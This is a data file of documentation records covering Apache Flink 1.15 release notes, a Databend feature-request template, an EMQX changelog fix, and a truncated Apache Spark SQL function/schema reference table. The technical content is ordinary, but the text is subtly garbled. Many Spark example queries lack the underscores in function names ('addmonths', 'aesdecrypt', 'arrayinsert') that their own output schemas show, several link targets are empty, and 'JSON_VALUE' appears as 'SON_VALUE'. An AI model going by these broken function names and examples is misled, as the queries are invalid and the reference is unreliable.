[ { "data": "title: \"Release Notes - Flink 1.15\" <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> These release notes discuss important aspects, such as configuration, behavior, or dependencies, that changed between Flink 1.14 and Flink 1.15. Please read these notes carefully if you are planning to upgrade your Flink version to 1.15. There are Several changes in Flink 1.15 that require updating dependency names when upgrading from earlier versions, mainly including the effort to opting-out Scala dependencies from non-scala modules and reorganize table modules. A quick checklist of the dependency changes is as follows: Any dependency to one of the following modules needs to be updated to no longer include a suffix: ``` flink-cep flink-clients flink-connector-elasticsearch-base flink-connector-elasticsearch6 flink-connector-elasticsearch7 flink-connector-gcp-pubsub flink-connector-hbase-1.4 flink-connector-hbase-2.2 flink-connector-hbase-base flink-connector-jdbc flink-connector-kafka flink-connector-kinesis flink-connector-nifi flink-connector-pulsar flink-connector-rabbitmq flink-container flink-dstl-dfs flink-gelly flink-hadoop-bulk flink-kubernetes flink-runtime-web flink-sql-connector-elasticsearch6 flink-sql-connector-elasticsearch7 flink-sql-connector-hbase-1.4 flink-sql-connector-hbase-2.2 flink-sql-connector-kafka flink-sql-connector-kinesis flink-sql-connector-rabbitmq flink-state-processor-api flink-statebackend-rocksdb flink-streaming-java flink-test-utils flink-yarn flink-table-api-java-bridge flink-table-runtime flink-sql-client flink-orc flink-orc-nohive flink-parquet ``` For Table / SQL users, the new module `flink-table-planner-loader` replaces `flink-table-planner_2.12` and avoids the need for a Scala suffix. For backwards compatibility, users can still swap it with `flink-table-planner_2.12` located in `opt/`. `flink-table-uber` has been split into `flink-table-api-java-uber`, `flink-table-planner(-loader)`, and `flink-table-runtime`. Scala users need to explicitly add a dependency to `flink-table-api-scala` or `flink-table-api-scala-bridge`. The detail of the involved issues are listed as follows. The Java DataSet/-Stream APIs are now independent of Scala and no longer transitively depend on it. The implications are the following: If you only intend to use the Java APIs, with Java types, then you can opt-in to a Scala-free Flink by removing the `flink-scala` jar from the `lib/` directory of the distribution. You are then free to use any Scala version and Scala libraries. You can either bundle Scala itself in your user-jar; or put into the `lib/` directory of the distribution. If you relied on the Scala APIs, without an explicit dependency on them, then you may experience issues when building your projects. 
You can solve this by adding explicit dependencies to the APIs that you are using. This should primarily affect users of the Scala `DataStream/CEP` APIs. A lot of modules have lost their Scala suffix. Further caution is advised when mixing dependencies from different Flink versions (e.g., an older connector), as you may now end up pulling in multiple versions of a single module (that would previously be prevented by the name being equal). The new module `flink-table-planner-loader` replaces" }, { "data": "and avoids the need for a Scala suffix. It is included in the Flink distribution under `lib/`. For backwards compatibility, users can still swap it with `flink-table-planner_2.12` located in `opt/`. As a consequence, `flink-table-uber` has been split into `flink-table-api-java-uber`, `flink-table-planner(-loader)`, and `flink-table-runtime`. `flink-sql-client` has no Scala suffix anymore. It is recommended to let new projects depend on `flink-table-planner-loader` (without Scala suffix) in provided scope. Note that the distribution does not include the Scala API by default. Scala users need to explicitly add a dependency to `flink-table-api-scala` or `flink-table-api-scala-bridge`. The `flink-table-runtime` has no Scala suffix anymore. Make sure to include `flink-scala` if the legacy type system (based on TypeInformation) with case classes is still used within Table API. The table file system connector is not part of the `flink-table-uber` JAR anymore but is a dedicated (but removable) `flink-connector-files` JAR in the `/lib` directory of a Flink distribution. The support of Java 8 is now deprecated and will be removed in a future release (). We recommend all users to migrate to Java 11. The default Java version in the Flink docker images is now Java 11 (). There are images built with Java 8, tagged with java8. Support for Scala 2.11 has been removed in . All Flink dependencies that (transitively) depend on Scala are suffixed with the Scala version that they are built for, for example `flink-streaming-scala_2.12`. Users should update all Flink dependecies, changing \"2.11\" to \"2.12\". Scala versions (2.11, 2.12, etc.) are not binary compatible with one another. That also means that there's no guarantee that you can restore from a savepoint, made with a Flink Scala 2.11 application, if you're upgrading to a Flink Scala 2.12 application. This depends on the data types that you have been using in your application. The Scala Shell/REPL has been removed in . The legacy casting behavior has been disabled by default. This might have implications on corner cases (string parsing, numeric overflows, to string representation, varchar/binary precisions). Set `table.exec.legacy-cast-behaviour=ENABLED` to restore the old behavior. `CHAR`/`VARCHAR` lengths are enforced (trimmed/padded) by default now before entering the table sink. Table functions that are called using Scala implicit conversions have been updated to use the new type system and new type inference. Users are requested to update their UDFs or use the deprecated `TableEnvironment.registerFunction` to restore the old behavior temporarily by calling the function via name. `flink-conf.yaml` and other configurations from outer layers (e.g. CLI) are now propagated into `TableConfig`. Even though configuration set directly in `TableConfig` has still precedence, this change can have side effects if table configuration was accidentally set in other layers. 
The previously deprecated methods `TableEnvironment.execute`, `Table.insertInto`, `TableEnvironment.fromTableSource`, `TableEnvironment.sqlUpdate`, and `TableEnvironment.explain` have been removed. Please use `TableEnvironment.executeSql`, `TableEnvironment.explainSql`, `TableEnvironment.createStatementSet`, as well as `Table.executeInsert`, `Table.explain` and `Table.execute` and the newly introduces classes `TableResult`, `ResultKind`, `StatementSet` and `ExplainDetail`. `STATEMENT` is a reserved keyword now. Use backticks to escape tables, fields and other references. `DataStreamScanProvider` and `DataStreamSinkProvider` for table connectors received an additional method that might break implementations that used lambdas before. We recommend static classes as a replacement and future" }, { "data": "It is recommended to update statement sets to the new SQL syntax: ```SQL EXECUTE STATEMENT SET BEGIN ... END; EXPLAIN STATEMENT SET BEGIN ... END; ``` This changes the result of a decimal `SUM()` with retraction and `AVG()`. Part of the behavior is restored back to be the same with 1.13 so that the behavior as a whole could be consistent with Hive / Spark. The `DecodingFormat` interface was used for both projectable and non-projectable formats which led to inconsistent implementations. The `FileSystemTableSource` has been updated to distinguish between those two interfaces now. Users that implement custom formats for `FileSystemTableSource` might need to verify the implementation and make sure to implement `ProjectableDecodingFormat` if necessary. This might have an impact on existing table source implementations as push down filters might not contain partition predicates anymore. However, the connector implementation for table sources that implement both partition and filter push down became easier with this change. This changes the result of a decimal `SUM()` between 1.14.0 and 1.14.1. It restores the behavior of 1.13 to be consistent with Hive/Spark. The string representation of `BOOLEAN` columns from DDL results (`true/false -> TRUE/FALSE`), and row columns in DQL results (`+I[...] -> (...)`) has changed for printing. The defaults for casting incomplete strings like `\"12\"` to TIME have changed from `12:01:01` to `12:00:00`. `STRING` to `TIMESTAMP(_LTZ)` casting now considers fractional seconds. Previously fractional seconds of any precision were ignored. This adds an additional operator to the topology if the new sink interfaces are used (e.g. for Kafka). It could cause issues in 1.14.1 when restoring from a 1.14 savepoint. A workaround is to cast the time attribute to a regular timestamp in the SQL statement closely before the sink. Functions that returned `VARCHAR(2000)` in 1.14, return `VARCHAR` with maximum length now. In particular this includes: ```SQL SON_VALUE CHR REVERSE SPLIT_INDEX REGEXP_EXTRACT PARSE_URL FROM_UNIXTIME DECODE DATE_FORMAT CONVERT_TZ ``` This issue added IS JSON for Table API. Notes that `IS JSON` does not return `NULL` anymore but always `FALSE` (even if the argument is `NULL`). Disabled `UPSERT INTO` statement. `UPSERT INTO` syntax was exposed by mistake in previous releases without detailed discussed. From this release every `UPSERT INTO` is going to throw an exception. Users of `UPSERT INTO` should use the documented `INSERT INTO` statement instead. Casting to `BOOLEAN` is not allowed from decimal numeric types anymore. This issue aims to fix various primary key issues that effectively made it impossible to use this feature. 
The change might affect savepoint backwards compatibility for those incorrect pipelines. Also the resulting changelog stream might be different after these changes. Pipelines that were correct before should be restorable from a savepoint. `StreamTableEnvironment.fromChangelogStream` might produce a different stream because primary keys were not properly considered before. The results of `Table#print` have changed to be closer to actual SQL data types. E.g. decimal is printing correctly with leading/trailing zeros. Support for the MapR FileSystem has been dropped. The `flink-connector-testing` module has been removed and users should use `flink-connector-test-utils` module" }, { "data": "Now the formats implementing `BulkWriterFormatFactory` don't need to implement partition keys reading anymore, as it's managed internally by `FileSystemTableSource`. `ElasticsearchXSinkBuilder` supersedes `ElasticsearchSink.Builder` and provides at-least-once writing with the new unified sink interface supporting both batch and streaming mode of DataStream API. For Elasticsearch 7 users that use the old ElasticsearchSink interface (`org.apache.flink.streaming.connectors.elasticsearch7.ElasticsearchSink`) and depend on their own elasticsearch-rest-high-level-client version, updating the client dependency to a version >= 7.14.0 is required due to internal changes. The old JDBC connector (indicated by `connector.type=jdbc` in DDL) has been removed. If not done already, users need to upgrade to the newer stack (indicated by `connector=jdbc` in DDL). New metrics `numRecordsSend` and `numRecordsSendErrors` have been introduced for users to monitor the number of records sent to the external system. The `numRecordsOut` should be used to monitor the number of records transferred between sink tasks. Connector developers should pay attention to the usage of these metrics numRecordsOut, numRecordsSend and numRecordsSendErrors while building sink connectors. Please refer to the new Kafka Sink for details. Additionally, since numRecordsOut now only counts the records sent between sink tasks and numRecordsOutErrors was designed for counting the records sent to the external system, we deprecated numRecordsOutErrors and recommend using numRecordsSendErrors instead. Adds retry logic to the cleanup steps of a finished job. This feature changes the way Flink jobs are cleaned up. Instead of trying once to clean up the job, this step will be repeated until it succeeds. Users are meant to fix the issue that prevents Flink from finalizing the job cleanup. The retry functionality can be configured and disabled. More details can be found . `TaskManagers` now explicitly send a signal to the `JobManager` when shutting down. This reduces the down-scaling delay in reactive mode (which was previously bound to the heartbeat timeout). Job metrics on the TaskManager are now removed when the last slot is released, rather than the last task. This means they may be reported for a longer time than before and when no tasks are running on the TaskManager. Fixes issue where the failover is not listed in the exception history but as a root cause. That could have happened if the failure occurred during `JobMaster` initialization. A new multiple component leader election service was implemented that only runs a single leader election per Flink process. If this should cause any problems, then you can set `high-availability.use-old-ha-services: true` in the `flink-conf.yaml` to use the old high availability services. 
Attempting to cancel a `FINISHED/FAILED` job now returns 409 Conflict instead of 404 Not Found. All `JobManagers` can now be queried for the status of a savepoint operation, irrespective of which `JobManager` received the initial request. The issue of re-submitting a job in Application Mode when the job finished but failed during cleanup is fixed through the introduction of the new component JobResultStore which enables Flink to persist the cleanup state of a job to the file system. (see ) Since 1.15, sort-shuffle has become the default blocking shuffle implementation and shuffle data compression is enabled by default. These changes influence batch jobs only, for more information, please refer to the" }, { "data": "When restoring from a savepoint or retained externalized checkpoint you can choose the mode in which you want to perform the operation. You can choose from `CLAIM`, `NO_CLAIM`, `LEGACY` (the old behavior). In `CLAIM` mode Flink takes ownership of the snapshot and will potentially try to remove the snapshot at a certain point in time. On the other hand the `NO_CLAIM` mode will make sure Flink does not depend on the existence of any files belonging to the initial snapshot. For a more thorough description see . When taking a savepoint you can specify the binary format. You can choose from native (specific to a particular state backend) or canonical (unified across all state backends). Shared state tracking changed to use checkpoint ID instead of reference counts. Shared state is not cleaned up on abortion anymore (but rather on subsumption or job termination). This might result in delays in discarding the state of aborted checkpoints. Introduce metrics of persistent bytes within each checkpoint (via REST API and UI), which could help users to know how much data size had been persisted during the incremental or change-log based checkpoint. In 1.15 we enabled the support of checkpoints after part of tasks finished by default, and made tasks waiting for the final checkpoint before exit to ensure all data got committed. However, it's worth noting that this change forces tasks to wait for one more checkpoint before exiting. In other words, this change will block the tasks until the next checkpoint get triggered and completed. If the checkpoint interval is long, the tasks' execution time would also be extended largely. In the worst case if the checkpoint interval is `Long.MAX_VALUE`, the tasks would be in fact blocked forever. More information about this feature and how to disable it could be found in . The State Processor API has been migrated from Flinks legacy DataSet API to now run over DataStreams run under `BATCH` execution. The internal log of RocksDB would stay under flink's log directory by default. Minimal supported Hadoop client version is now 2.8.5 (version of the Flink runtime dependency). The client can still talk to older server versions as the binary protocol should be backward compatible. Elasticsearch libraries used by the connector are bumped to 7.15.2 and 6.8.20 respectively. For Elasticsearch 7 users that use the old ElasticsearchSink interface (`org.apache.flink.streaming.connectors.elasticsearch7.ElasticsearchSink`) and depend on their own `elasticsearch-rest-high-level-client` version, will need to update the client dependency to a version >= 7.14.0 due to internal changes. Support for using Zookeeper 3.4 for HA has been dropped. Users relying on Zookeeper need to upgrade to 3.5/3.6. By default Flink now uses a Zookeeper 3.5 client. 
Kafka connector uses Kafka client 2.8.1 by default now. For security purposes, standalone clusters now bind the REST API and RPC endpoints to localhost by default. The goal is to prevent cases where users unknowingly exposed the cluster to the outside, as they would previously bind to all interfaces. This can be reverted by removing the: `rest.bind-address` `jobmanager.bind-host` `taskmanager.bind-host` settings from the flink-conf.yaml . Note that within Docker containers, the REST API still binds to 0.0.0.0." } ]
{ "category": "App Definition and Development", "file_name": "10_feature_request.md", "project_name": "Databend", "subcategory": "Database" }
[ { "data": "name: Feature request title: 'Feature: ' about: Suggest an idea for Databend labels: [ \"C-feature\" ] Summary Description for this feature." } ]
{ "category": "App Definition and Development", "file_name": "fix-12359.en.md", "project_name": "EMQ Technologies", "subcategory": "Streaming & Messaging" }
[ { "data": "Fixed an issue that could lead to error messages when restarting a node configured with some types of data bridges. Said bridges could also start in a failed state, requiring manual restart." } ]
{ "category": "App Definition and Development", "file_name": "sql-expression-schema.md", "project_name": "Apache Spark", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Automatically generated by ExpressionsSchemaSuite --> | Class name | Function name or alias | Query example | Output schema | | - | - | - | - | | org.apache.spark.sql.catalyst.expressions.Abs | abs | SELECT abs(-1) | struct<abs(-1):int> | | org.apache.spark.sql.catalyst.expressions.Acos | acos | SELECT acos(1) | struct<ACOS(1):double> | | org.apache.spark.sql.catalyst.expressions.Acosh | acosh | SELECT acosh(1) | struct<ACOSH(1):double> | | org.apache.spark.sql.catalyst.expressions.Add | + | SELECT 1 + 2 | struct<(1 + 2):int> | | org.apache.spark.sql.catalyst.expressions.AddMonths | addmonths | SELECT addmonths('2016-08-31', 1) | struct<add_months(2016-08-31, 1):date> | | org.apache.spark.sql.catalyst.expressions.AesDecrypt | aesdecrypt | SELECT aesdecrypt(unhex('83F16B2AA704794132802D248E6BFD4E380078182D1544813898AC97E709B28A94'), '0000111122223333') | struct<aes_decrypt(unhex(83F16B2AA704794132802D248E6BFD4E380078182D1544813898AC97E709B28A94), 0000111122223333, GCM, DEFAULT, ):binary> | | org.apache.spark.sql.catalyst.expressions.AesEncrypt | aesencrypt | SELECT hex(aesencrypt('Spark', '0000111122223333')) | struct<hex(aes_encrypt(Spark, 0000111122223333, GCM, DEFAULT, , )):string> | | org.apache.spark.sql.catalyst.expressions.And | and | SELECT true and true | struct<(true AND true):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayAggregate | aggregate | SELECT aggregate(array(1, 2, 3), 0, (acc, x) -> acc + x) | struct<aggregate(array(1, 2, 3), 0, lambdafunction((namedlambdavariable() + namedlambdavariable()), namedlambdavariable(), namedlambdavariable()), lambdafunction(namedlambdavariable(), namedlambdavariable())):int> | | org.apache.spark.sql.catalyst.expressions.ArrayAggregate | reduce | SELECT reduce(array(1, 2, 3), 0, (acc, x) -> acc + x) | struct<reduce(array(1, 2, 3), 0, lambdafunction((namedlambdavariable() + namedlambdavariable()), namedlambdavariable(), namedlambdavariable()), lambdafunction(namedlambdavariable(), namedlambdavariable())):int> | | org.apache.spark.sql.catalyst.expressions.ArrayAppend | arrayappend | SELECT arrayappend(array('b', 'd', 'c', 'a'), 'd') | struct<array_append(array(b, d, c, a), d):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArrayCompact | arraycompact | SELECT arraycompact(array(1, 2, 3, null)) | struct<array_compact(array(1, 2, 3, NULL)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayContains | arraycontains | SELECT arraycontains(array(1, 2, 3), 2) | struct<array_contains(array(1, 2, 3), 2):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayDistinct | arraydistinct | SELECT arraydistinct(array(1, 2, 3, null, 3)) | struct<array_distinct(array(1, 2, 3, NULL, 3)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayExcept | arrayexcept | SELECT arrayexcept(array(1, 2, 3), array(1, 3, 5)) | struct<array_except(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayExists | exists | SELECT exists(array(1, 2, 3), x -> x % 2 == 0) | struct<exists(array(1, 2, 3), lambdafunction(((namedlambdavariable() % 2) = 0), namedlambdavariable())):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayFilter | filter | SELECT filter(array(1, 2, 3), x -> x % 2 == 1) | struct<filter(array(1, 2, 3), lambdafunction(((namedlambdavariable() % 2) = 1), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayForAll | forall | SELECT forall(array(1, 2, 3), x -> x % 2 == 0) | struct<forall(array(1, 2, 3), 
lambdafunction(((namedlambdavariable() % 2) = 0), namedlambdavariable())):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayInsert | arrayinsert | SELECT arrayinsert(array(1, 2, 3, 4), 5, 5) | struct<array_insert(array(1, 2, 3, 4), 5, 5):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayIntersect | arrayintersect | SELECT arrayintersect(array(1, 2, 3), array(1, 3, 5)) | struct<array_intersect(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayJoin | arrayjoin | SELECT arrayjoin(array('hello', 'world'), ' ') | struct<array_join(array(hello, world), ):string> | | org.apache.spark.sql.catalyst.expressions.ArrayMax | arraymax | SELECT arraymax(array(1, 20, null, 3)) | struct<array_max(array(1, 20, NULL, 3)):int> | | org.apache.spark.sql.catalyst.expressions.ArrayMin | arraymin | SELECT arraymin(array(1, 20, null, 3)) | struct<array_min(array(1, 20, NULL, 3)):int> | | org.apache.spark.sql.catalyst.expressions.ArrayPosition | arrayposition | SELECT arrayposition(array(312, 773, 708, 708), 708) | struct<array_position(array(312, 773, 708, 708), 708):bigint> | | org.apache.spark.sql.catalyst.expressions.ArrayPrepend | arrayprepend | SELECT arrayprepend(array('b', 'd', 'c', 'a'), 'd') | struct<array_prepend(array(b, d, c, a), d):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArrayRemove | arrayremove | SELECT arrayremove(array(1, 2, 3, null, 3), 3) | struct<array_remove(array(1, 2, 3, NULL, 3), 3):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayRepeat | arrayrepeat | SELECT arrayrepeat('123', 2) | struct<array_repeat(123, 2):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArraySize | arraysize | SELECT arraysize(array('b', 'd', 'c', 'a')) | struct<array_size(array(b, d, c, a)):int> | |" }, { "data": "| arraysort | SELECT arraysort(array(5, 6, 1), (left, right) -> case when left < right then -1 when left > right then 1 else 0 end) | struct<array_sort(array(5, 6, 1), lambdafunction(CASE WHEN (namedlambdavariable() < namedlambdavariable()) THEN -1 WHEN (namedlambdavariable() > namedlambdavariable()) THEN 1 ELSE 0 END, namedlambdavariable(), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayTransform | transform | SELECT transform(array(1, 2, 3), x -> x + 1) | struct<transform(array(1, 2, 3), lambdafunction((namedlambdavariable() + 1), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayUnion | arrayunion | SELECT arrayunion(array(1, 2, 3), array(1, 3, 5)) | struct<array_union(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArraysOverlap | arraysoverlap | SELECT arraysoverlap(array(1, 2, 3), array(3, 4, 5)) | struct<arrays_overlap(array(1, 2, 3), array(3, 4, 5)):boolean> | | org.apache.spark.sql.catalyst.expressions.ArraysZip | arrayszip | SELECT arrayszip(array(1, 2, 3), array(2, 3, 4)) | struct<arrays_zip(array(1, 2, 3), array(2, 3, 4)):array<struct<0:int,1:int>>> | | org.apache.spark.sql.catalyst.expressions.Ascii | ascii | SELECT ascii('222') | struct<ascii(222):int> | | org.apache.spark.sql.catalyst.expressions.Asin | asin | SELECT asin(0) | struct<ASIN(0):double> | | org.apache.spark.sql.catalyst.expressions.Asinh | asinh | SELECT asinh(0) | struct<ASINH(0):double> | | org.apache.spark.sql.catalyst.expressions.AssertTrue | asserttrue | SELECT asserttrue(0 < 1) | struct<assert_true((0 < 1), '(0 < 1)' is not true!):void> | | org.apache.spark.sql.catalyst.expressions.Atan | atan | 
SELECT atan(0) | struct<ATAN(0):double> | | org.apache.spark.sql.catalyst.expressions.Atan2 | atan2 | SELECT atan2(0, 0) | struct<ATAN2(0, 0):double> | | org.apache.spark.sql.catalyst.expressions.Atanh | atanh | SELECT atanh(0) | struct<ATANH(0):double> | | org.apache.spark.sql.catalyst.expressions.BRound | bround | SELECT bround(2.5, 0) | struct<bround(2.5, 0):decimal(2,0)> | | org.apache.spark.sql.catalyst.expressions.Base64 | base64 | SELECT base64('Spark SQL') | struct<base64(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Between | between | SELECT 0.5 between 0.1 AND 1.0 | struct<between(0.5, 0.1, 1.0):boolean> | | org.apache.spark.sql.catalyst.expressions.Bin | bin | SELECT bin(13) | struct<bin(13):string> | | org.apache.spark.sql.catalyst.expressions.BitLength | bitlength | SELECT bitlength('Spark SQL') | struct<bit_length(Spark SQL):int> | | org.apache.spark.sql.catalyst.expressions.BitmapBitPosition | bitmapbitposition | SELECT bitmapbitposition(1) | struct<bitmapbitposition(1):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapBucketNumber | bitmapbucketnumber | SELECT bitmapbucketnumber(123) | struct<bitmapbucketnumber(123):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapConstructAgg | bitmapconstructagg | SELECT substring(hex(bitmapconstructagg(bitmapbitposition(col))), 0, 6) FROM VALUES (1), (2), (3) AS tab(col) | struct<substring(hex(bitmapconstructagg(bitmapbitposition(col))), 0, 6):string> | | org.apache.spark.sql.catalyst.expressions.BitmapCount | bitmapcount | SELECT bitmapcount(X '1010') | struct<bitmap_count(X'1010'):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapOrAgg | bitmaporagg | SELECT substring(hex(bitmaporagg(col)), 0, 6) FROM VALUES (X '10'), (X '20'), (X '40') AS tab(col) | struct<substring(hex(bitmaporagg(col)), 0, 6):string> | | org.apache.spark.sql.catalyst.expressions.BitwiseAnd | & | SELECT 3 & 5 | struct<(3 & 5):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseCount | bitcount | SELECT bitcount(0) | struct<bit_count(0):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseGet | bitget | SELECT bitget(11, 0) | struct<bit_get(11, 0):tinyint> | | org.apache.spark.sql.catalyst.expressions.BitwiseGet | getbit | SELECT getbit(11, 0) | struct<getbit(11, 0):tinyint> | | org.apache.spark.sql.catalyst.expressions.BitwiseNot | ~ | SELECT ~ 0 | struct<~0:int> | | org.apache.spark.sql.catalyst.expressions.BitwiseOr | &#124; | SELECT 3 &#124; 5 | struct<(3 &#124; 5):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseXor | ^ | SELECT 3 ^ 5 | struct<(3 ^ 5):int> | | org.apache.spark.sql.catalyst.expressions.CallMethodViaReflection | javamethod | SELECT javamethod('java.util.UUID', 'randomUUID') | struct<java_method(java.util.UUID, randomUUID):string> | | org.apache.spark.sql.catalyst.expressions.CallMethodViaReflection | reflect | SELECT reflect('java.util.UUID', 'randomUUID') | struct<reflect(java.util.UUID, randomUUID):string> | | org.apache.spark.sql.catalyst.expressions.CaseWhen | when | SELECT CASE WHEN 1 > 0 THEN 1 WHEN 2 > 0 THEN 2.0 ELSE 1.2 END | struct<CASE WHEN (1 > 0) THEN 1 WHEN (2 > 0) THEN 2.0 ELSE 1.2 END:decimal(11,1)> | | org.apache.spark.sql.catalyst.expressions.Cast | bigint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | binary | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | boolean | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | cast | SELECT cast('10' as int) | struct<CAST(10 AS INT):int> | | 
org.apache.spark.sql.catalyst.expressions.Cast | date | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | decimal | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | double | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | float | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | int | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | smallint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | string | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | timestamp | N/A | N/A | |" }, { "data": "| tinyint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cbrt | cbrt | SELECT cbrt(27.0) | struct<CBRT(27.0):double> | | org.apache.spark.sql.catalyst.expressions.CeilExpressionBuilder | ceil | SELECT ceil(-0.1) | struct<CEIL(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.CeilExpressionBuilder | ceiling | SELECT ceiling(-0.1) | struct<ceiling(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.Chr | char | SELECT char(65) | struct<char(65):string> | | org.apache.spark.sql.catalyst.expressions.Chr | chr | SELECT chr(65) | struct<chr(65):string> | | org.apache.spark.sql.catalyst.expressions.Coalesce | coalesce | SELECT coalesce(NULL, 1, NULL) | struct<coalesce(NULL, 1, NULL):int> | | org.apache.spark.sql.catalyst.expressions.CollateExpressionBuilder | collate | SELECT COLLATION('Spark SQL' collate UTF8BINARYLCASE) | struct<collation(collate(Spark SQL)):string> | | org.apache.spark.sql.catalyst.expressions.Collation | collation | SELECT collation('Spark SQL') | struct<collation(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Concat | concat | SELECT concat('Spark', 'SQL') | struct<concat(Spark, SQL):string> | | org.apache.spark.sql.catalyst.expressions.ConcatWs | concatws | SELECT concatws(' ', 'Spark', 'SQL') | struct<concat_ws( , Spark, SQL):string> | | org.apache.spark.sql.catalyst.expressions.ContainsExpressionBuilder | contains | SELECT contains('Spark SQL', 'Spark') | struct<contains(Spark SQL, Spark):boolean> | | org.apache.spark.sql.catalyst.expressions.Conv | conv | SELECT conv('100', 2, 10) | struct<conv(100, 2, 10):string> | | org.apache.spark.sql.catalyst.expressions.ConvertTimezone | converttimezone | SELECT converttimezone('Europe/Brussels', 'America/LosAngeles', timestampntz'2021-12-06 00:00:00') | struct<converttimezone(Europe/Brussels, America/LosAngeles, TIMESTAMPNTZ '2021-12-06 00:00:00'):timestampntz> | | org.apache.spark.sql.catalyst.expressions.Cos | cos | SELECT cos(0) | struct<COS(0):double> | | org.apache.spark.sql.catalyst.expressions.Cosh | cosh | SELECT cosh(0) | struct<COSH(0):double> | | org.apache.spark.sql.catalyst.expressions.Cot | cot | SELECT cot(1) | struct<COT(1):double> | | org.apache.spark.sql.catalyst.expressions.Crc32 | crc32 | SELECT crc32('Spark') | struct<crc32(Spark):bigint> | | org.apache.spark.sql.catalyst.expressions.CreateArray | array | SELECT array(1, 2, 3) | struct<array(1, 2, 3):array<int>> | | org.apache.spark.sql.catalyst.expressions.CreateMap | map | SELECT map(1.0, '2', 3.0, '4') | struct<map(1.0, 2, 3.0, 4):map<decimal(2,1),string>> | | org.apache.spark.sql.catalyst.expressions.CreateNamedStruct | namedstruct | SELECT namedstruct(\"a\", 1, \"b\", 2, \"c\", 3) | struct<named_struct(a, 1, b, 2, c, 3):struct<a:int,b:int,c:int>> | | org.apache.spark.sql.catalyst.expressions.CreateNamedStruct | struct | SELECT struct(1, 2, 3) | struct<struct(1, 2, 3):struct<col1:int,col2:int,col3:int>> | | 
org.apache.spark.sql.catalyst.expressions.Csc | csc | SELECT csc(1) | struct<CSC(1):double> | | org.apache.spark.sql.catalyst.expressions.CsvToStructs | fromcsv | SELECT fromcsv('1, 0.8', 'a INT, b DOUBLE') | struct<from_csv(1, 0.8):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.CumeDist | cumedist | SELECT a, b, cumedist() OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,cume_dist() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):double> | | org.apache.spark.sql.catalyst.expressions.CurDateExpressionBuilder | curdate | SELECT curdate() | struct<current_date():date> | | org.apache.spark.sql.catalyst.expressions.CurrentCatalog | currentcatalog | SELECT currentcatalog() | struct<current_catalog():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDatabase | currentdatabase | SELECT currentdatabase() | struct<current_schema():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDatabase | currentschema | SELECT currentschema() | struct<current_schema():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDate | currentdate | SELECT currentdate() | struct<current_date():date> | | org.apache.spark.sql.catalyst.expressions.CurrentTimeZone | currenttimezone | SELECT currenttimezone() | struct<current_timezone():string> | | org.apache.spark.sql.catalyst.expressions.CurrentTimestamp | currenttimestamp | SELECT currenttimestamp() | struct<current_timestamp():timestamp> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | currentuser | SELECT currentuser() | struct<current_user():string> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | sessionuser | SELECT sessionuser() | struct<session_user():string> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | user | SELECT user() | struct<user():string> | | org.apache.spark.sql.catalyst.expressions.DateAdd | dateadd | SELECT dateadd('2016-07-30', 1) | struct<date_add(2016-07-30, 1):date> | | org.apache.spark.sql.catalyst.expressions.DateAdd | dateadd | SELECT dateadd('2016-07-30', 1) | struct<date_add(2016-07-30, 1):date> | | 